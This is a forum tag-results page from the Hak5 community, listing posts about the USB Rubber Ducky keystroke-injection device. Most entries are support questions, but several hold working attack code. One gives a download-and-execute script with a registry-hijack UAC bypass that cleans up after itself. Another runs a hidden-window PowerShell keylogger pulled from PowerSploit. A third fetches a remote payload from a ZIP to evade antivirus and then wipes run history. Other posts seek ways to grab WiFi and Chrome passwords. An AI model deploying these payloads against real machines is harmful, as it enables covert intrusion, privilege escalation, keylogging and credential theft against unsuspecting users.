Jump to content

Search the Community

Showing results for tags 'Ducky'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • New USB Rubber Ducky
    • WiFi Pineapple
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
    • WiFi Coconut
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • Legacy Devices
    • Classic USB Rubber Ducky
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests

  1. So I have been working on a script (admittedly for a while, this is my first script) to grab wifi names and passwords off computers and dump them to a text files. So fair I have it working great, it grabs every wireless Internet connection that the computer has ever made and it dumps it straight back to usb within seconds, to grab and go. I just need help with one thing... How to hide the powershell window and is there anyway of making this script better (I already know i can use powershell to sent txt files to servers or through email i just think its easier with such a simple script to dump it straight back to usb)? Here is the Script
  2. Hello! This is my first post and contribute to this community, one of hopefully many. I am yet to receive my rubber ducky, so while waiting i thought i give writing some scripts a go. I consider the rubber ducky to be the mother of physical access exploits, being able to deploy anything in a very short period of time. DELAY 750 GUI r DELAY 1000 STRING powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://myhost.com/script.txt', '%temp%/run.vbs') ;Start-Process '%temp%/run.vbs'}" DELAY 500 ENTER Above is a basic rubber ducky script that downloads and executes a .vbs script in one line using the "run" prompt in windows. Nothing fancy, fast and easy download and execute, however we are taking this a bit further. (This is the part i cannot yet test myself due to me not having the Rubber ducky at hand, however based on examples, this should be OK, please confirm if you have time) To get maximum speed we are using a 2 step process, getting a low sized script file is much faster then going to the payload itself straight away. This is the script.txt (run.vbs when saved) Sub Main() 'Setting some vars fileurl = "https://the.earth.li/~sgtatham/putty/latest/x86/putty.exe" filename = WScript.CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2) & "/pt.exe" 'Download function dim shellobj set shellobj = wscript.createobject("wscript.shell") strlink = fileurl strsaveto = filename set objhttpdownload = createobject("msxml2.xmlhttp" ) objhttpdownload.open "get", strlink, false objhttpdownload.send set objfsodownload = createobject ("scripting.filesystemobject") if objfsodownload.fileexists (strsaveto) then objfsodownload.deletefile (strsaveto) end if if objhttpdownload.status = 200 then dim objstreamdownload set objstreamdownload = createobject("adodb.stream") with objstreamdownload .type = 1 .open .write objhttpdownload.responsebody .savetofile strsaveto .close end with set objstreamdownload = nothing end if 'UAC bypass/exploit setup Set WshShell = CreateObject("WScript.Shell") myKey = "HKCU\Software\Classes\mscfile\shell\open\command\" WshShell.RegWrite myKey,filename ,"REG_SZ" 'UAC bypass/exploit trigger CreateObject("WScript.Shell").Run "eventvwr.exe" WScript.Sleep 1000 'UAC bypass/exploit cleanup Set objShell = Wscript.CreateObject("Wscript.Shell") objShell.RegDelete "HKCU\Software\Classes\mscfile\shell\open\command\" 'Cleanup removal of this script after completed Set Cleanup = WScript.CreateObject("WScript.Shell") Cleanup.Run "cmd /c del %temp%\run.vbs", 0, True End Sub 'We dont want to display any errors On Error Resume Next Main If Err.Number Then 'on error cleanup and exit set Cleanup = WScript.CreateObject("WScript.Shell") Cleanup.Run "cmd /c del %temp%\run.vbs", 0, True WScript.Quit 4711 End If I have commented this to my best ability. its pretty straight forward and is about 2kb in size It download and executes (in this case putty) as pt.exe in the temp folder of the current windows user. It then proceeds to write the payload file-path as a string value to "HKCU\Software\Classes\mscfile\shell\open\command\", we then trigger "eventvwr.exe" which is a built in windows application, this will launch our payload (pt.exe) as ADMIN on the targeted machine without any form of UAC prompt prompting the user. We then remove the reg-key to avoid issues in the future followed by the vbs script removing itself from the computer leaving little trace. If any point we get an error we also remove the script. . This method of bypassing UAC giving admin rights to any application using the path written as a string in the reg-key works on all versions of windows(From where the UAC system was introduced ofc) as far up as Windows 10 Pro 64Bit Build 1607. Basically 90% of machines. I hope you all enjoyed this, i will be making a short demo video of this to see the deployment speed when i receive my copy of the rubber ducky. Best Regards ~skiddie
  3. Hello friends! Today I am going to show you a very simple 11 line USB Rubber Ducky Keylogger hack using powershell! Super simple. What this does is it starts a powershell as a hidden window, so the actual application will not be visible on the taskbar. Only through the Task Manager. Then it downloads a simple script from github into memory, then executes the keylogger command. The second to last line, after "-LogPath" input the location you want it to place the keylog file. And the "-Timeout" command is how many minutes you want to command to run. Here is the code: DELAY 500 GUI r DELAY 50 STRING powershell -WindowStyle hidden ENTER DELAY 100 STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1') ENTER DELAY 300 STRING Get-Keystrokes -LogPath C:\Users\Garrett\Desktop\testing123.txt -Timeout 1 ENTER Of course, go to the www.ducktoolkit.com and encode it. Comment any suggestions / thoughts! I will be posting more scripts as I go. Also, I am working on a script to email the keylog file to your email. Will upload once I get that working. Hope you enjoy!
  4. Introducing the latest Composite Firmware - Codename : The Twin Duck The Ducky primarily acts as a USB Mass Storage Device, and on a click of the button will start emulating a Keyboard. Its multi-OS, multi-lingual and comes in three flavours: c_duck_v2.hex - Supports DuckyScript as HID payload, triggered automatically and on GPIO (limited instructions) c_duck_v2_S001.hex - Triggered on CAPS/NUM/SCROLL LOCK c_duck_v2_S002.hex - Triggered on Ducky's GPIO only! Depending on your circumstances, you may want to use either one of these available firmwares. Downloads http://code.google.c.../downloads/list Please test and post feedback here. Snake
  5. Hello there, i´m writing my first payload for the USB Rubber Ducky . I'd need a key combination to hide a window, the only problem i have is that i need to do something IN the window so i can't just ban it to the task bar. I hope you could help me. Greetings Ares
  6. Hi Guys I need help creating a payload on the Twin Duck rubber ducky that silently runs tree /a/ /f on the victims computer and then saves the output to the ducky. This is the code that I have so far: for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%d&echo tree /a /f > echotree.cmd&echotree.cmd > %myd%/results.txt&del echotree.cmd I would like to run it in the Run line. Please help me to optimise it!
  7. Ensign

    Demonstration

    Hi, I have just bought my first Rubber Ducky. And have a question. My intended use is one of awareness. To show what is possible and how a machine can be vulnerable in order to provoke thought and discussion. I know that I can write a payload and once inserting the ducky into the target machine it will execute. My question is, could I write a payload and pre position the file onto a target machine so that I may call the file either remotely or by a nefarious shortcut activated by the locally logged on user? The benefit to me if I can do this is that I can have multiple payloads, showing different things, without having to use multiple Rubber Ducky and inserting the USB each time. Thank you and I look forward to your replies.
  8. Hello I recently purchased a USB Rubber Ducky and I soon flashed it with twin duck. I then a script on the SD card and plug it in to test the payload. The ducky is just flashing from Green to red countinously. A little help would be great. Thank you, Cassetti
  9. How does one get the USB Rubber Ducky to mimic ALT PAUSE b, all pressed at the same time? Seems like right now it can only mimic one other key or char with ALT.
  10. Hello! Thought some of you might find this useful. It is simply a script that retrieves the iMessages archive and sends it over email. The code is a bit long and can probably be sized down and made "better". I would love some feed back on it as this is my first script. Enjoy -wiredbrother https://pastebin.com/XZrcJu0s
  11. Hey there Hak5 community and fellow Rubber Ducky users! I'm a MacOS user and a beginner when it comes to coding, but I came up with a little bash script to help speed up the encoding process. It's nothing fancy. When I was writing a payload and having to encode then replace the file on the microSD and all that - it was getting a bit tedious. I call it duck_it. It basically takes your scripts as .txt files, encodes them, and transfers them to your microSD card and ejects the card. https://github.com/dot-iso/duck_it I'm new to Bash and GitHub, so there may be some n00b stuff. I'm sure there's a lot of room for improvement
  12. Hello, I installed the Twin Duck firmware a few days ago. I used the Ducky Flasher for flashing, so far so good. Today I wanted to restore the original firmware, unfortunately without success. The Ducky Flasher reports "Error opening the file. Something went wrong with creating the memory image." What did I do wrong ? is there a chance to restore the Ducky? Thanks in advance
  13. How does it work / what is it? I have just found one of the fastest ways of executing as much PowerShell code as you want using the USB Rubber Ducky! This script works by grabbing your PowerShell code from an external website. The code the ducky inputs is only 93 Characters long which takes the ducky only around 2 seconds to input. Tutorial: First, you will need a website to upload your .TXT file with all the PowerShell code you wish to execute. You can use a website such as hostinger or 000webhost to create this file. Although, remember these servers may not have 100% uptime. Script for website: The code on my website looks something like this... Add-Type -AssemblyName System.IO.Compression.FileSystem function Unzip { param([string]$zipfile, [string]$outpath) [System.IO.Compression.ZipFile]::ExtractToDirectory($zipfile, $outpath) } $path = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" $arr = (Get-Item -Path $path).Property $url = "www.linkToEndPayload" $output = "$env:temp/test.zip"; $out = "$env:temp/Remake.txt"; Remove-Item -Path $output Invoke-WebRequest -Uri $url -OutFile $output Unzip $output "$env:temp/" Rename-Item -Path $out -NewName "Remake.exe" Start-Process -FilePath "$env:temp/Remake.exe" foreach($item in $arr) { if($item -ne "MRUList") { Remove-ItemProperty -Path $path -Name $item -ErrorAction SilentlyContinue } } This code downloads the .EXE payload (Which is stored in a .ZIP file.) We will be running this file on our subjects system. Then the code uses an imported C# library to extract a. ZIP file which allows us to bypass a web protection software called Sophos from blocking the .EXE that we are trying to download. The file is unzipped and then the .EXE is run. Finally, the code deletes the run box history that the ducky creates. Finally, we have to setup the ducky. The ducky simply grabs the above code with a quick web request and then executes it. The code is as short and simple as this... Script for ducky: DELAY 500 GUI r DELAY 100 STRING powershell -W Hidden -Exec Bypass $a = Invoke-WebRequest www.linkToPowershellCodeAbove.com/script.txt; Invoke-Expression $a ENTER That's it! Very fast powershell execution. You can have as much code as you want on the script website. The only disadvantage to this code is that you must be connected to a internet connection. PS: I'm not very good at PowerShell Scripting
  14. I want to build a USB rubber ducky simulator using python. How Can I simulate keyboard presses in python? Can someone point me in the right direction please? In an ideal world I would love to develope a suite of tools that can be accessed from a GUI to configure/test and monitor Hak5 gear, but sadly this maybe beyond my capabilities :-(
  15. I am unable to use scripts that open CMD as admin because phantom ENTER lines are bring executed after my "STRING cmd" lines in my ducky scripts. This is also happening other places. I have a workaround to get an admin prompt; but it is of no use because these ENTER keystrokes are bring entered in places where they should not be; and since they aren't actually in the script I cannot remove them. It may be that the end of line EOL character (LF in this case) is being interpreted as an ENTER keystroke. Is there anyway to convert all EOL characters in a file from LF or CRLF to some kind of NULL character so the Duckhunter HID conversion tool won't add in these ENTER keystrokes? Thanks to all who reply. This has been driving me nuts!
  16. Is there any documentation for the many USB Rubber Ducky firmware images? From what I have been able to surmise in the forums, the duck.hex is the original firmware and the c_duck images are the Twin Duck variants. Can anyone tell me what functions the other firmware images on GitHub might serve and whether they require keyboard interaction to function? Composite_Duck_4cap.hex Composite_Duck_S003.hex Rand_Delay.hex USB_Spammer_v1.0.hex USB_v2.1.hex c_duck_osx.hex c_duck_uk.hex c_duck_us.hex c_duck_v2.1.hex c_duck_v2_S001.hex c_duck_v2_S002.hex duck.hex duck_v2.1.hex duck_v2.hex m_duck.hex m_duck_v2.hex osx.hex usb.hex usb_v2.hex
  17. Hi all, First of all, sorry if this is not in the right section. Admins please move if so. So I built a little Pro Micro ducky yesterday, I loaded it in to the Duckuino and got my code, after uploading it into th Pro Micro, I don't get the results I am looking for. I am using a British keyboard layout laptop that has been converted to AZERTY (stickers) This input language I use is English I would like to test the Wifi Grabber script on my PC but all I get is random programs opening not even the CMD prompt, I can see at some point it has written on a .txt file that I already had open and it seems to be messing up AZERTY and QWERTY NOW I have done some reading and lots of trial and error on these sites and apps but still cant get this to work. https://github.com/Plazmaz/Duckuino https://ducktoolkit.com/ I am new to this so please be nice, If there is a correct procedure for this I would be grateful Kind Regards Matt
  18. Hey guys I've spent a few weeks playing with the usb rubber ducky and I finally understand it now ( I'm new to hacking and computers and stuff. And when I mean hacking I mean white hat, discovering flaws and searching for fixes). The rubber ducky is great and powerful. First off. There are a lot of flaws detected for windows and mac machines but I am looking for flaws in chromebook machines. I've discovered so many but then again there are so many more. Chromebooks are the future of tech/laptops/ small laptop book things. Is there a way to get cached passwords just through a command line? Chromebooks are super slow and the rubber duck is fast... it wouldn't work to go into chrome settings then copy passwords. Anyone find a flaw which allows them to get chrome passwords fast?
  19. Hey, does anyone in the UK/France have a place where you can order the USB Rubber Ducky with free/cheap delivery? Thanks!
  20. Hey guys I'm new to the USB rubber ducky and have some questions. I want to try and make some payloads for chromebooks due to their wide use everywhere. Will that work? The password stealing payload was cool but it doesn't work due to the chrome update. I have a work around but it takes a little longer, involves going to chrome web store, installing "show password" extension, showing password, copying it, etc. Is that even possible to do with the USB rubber ducky? Where do I start? Thanks
  21. Hello, I'm trying to compile custom firmware for a rubberducky, because I want to change the ducky's serialnumber. I've found the setting I want to change: \USB-Rubber-Ducky-master\Firmware\Source\Mass_Storage\USB\src\config\conf_usb.h > define USB_DEVICE_SERIAL_NAME "..." // Disk SN for MSC So now I just need to compile this into new working firmware. But I can't find a guide on doing this anywhere, and I haven't done much compiling/coding, so I don't have the experience to do it on my own. I've downloaded "Atmel Studio 7.0" since I read somewhere that that is what's needed, but after a lot of clicking arround and opening files and pressing buttons, I can't seem to get it to compile anything.. Can anyone help me with this? FYI: I've done my fair share of coding for arduino's/pi's and hardware hacking so I'm not a complete noob, but this has left me flustered a bit...
  22. The Wifi password grabber has been working great for the PC's ive used it on. Then i noticed something, On networks with two or more words in their SSID (etc; Park Home, Meme House or KFC Wifi) The Ducky will output : Network type: %B%, Authentication: %C%, Password: %D%, Instead of the normal Values. This only happens on networks with more than 2 words in their SSID. Any way to fix it? Link to the github with the wifi payload: https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---WiFi-password-grabber
  23. Hello! I have run into a problem on the new 1.1 Firmware for the BashBunny! The problem is that I am not able to use a diffrent keymap than US, in this case SE. Before you sat the languages by QUACK SET_LANGUAGE se but know according to the new readme in the docs folder you set the languages by DUCKY_LANG=us. With and without QUACK in front of it I don't get it to work. I have copied all the .json languages files from ducky installer to the languages folder, maybe the problem is that I have not installed the languages files correctly. Help would be appreciated.
  24. Hey all, I'm interested in compiling Ducky Script to c++ that will run on an arduino. I would like to take ducky scripts such as the Wallpaper prank, and be able to easily put it on an arduino without having to modify any code myself. Why use an arduino? I have a lot of them, and I would like to take advantage of them. While I did manually write the code for the wallpaper prank in c++ last night, I would like the process to be streamlined by a compiler. I've done some research already and have tried out a few compilers that people have made, such as the Duckuino compiler, but the ones I've found are buggy and throw errors when the arduino IDE is compiling the c++ produced by the Ducky Script compiler. My question is, does anyone know of a working compiler that will take Ducky Script and push it to valid arduino code; or should I just fix the bugs in the Duckuino repo? Let me know if you need more info, or if I'm unclear anywhere. Thanks!
×
×
  • Create New...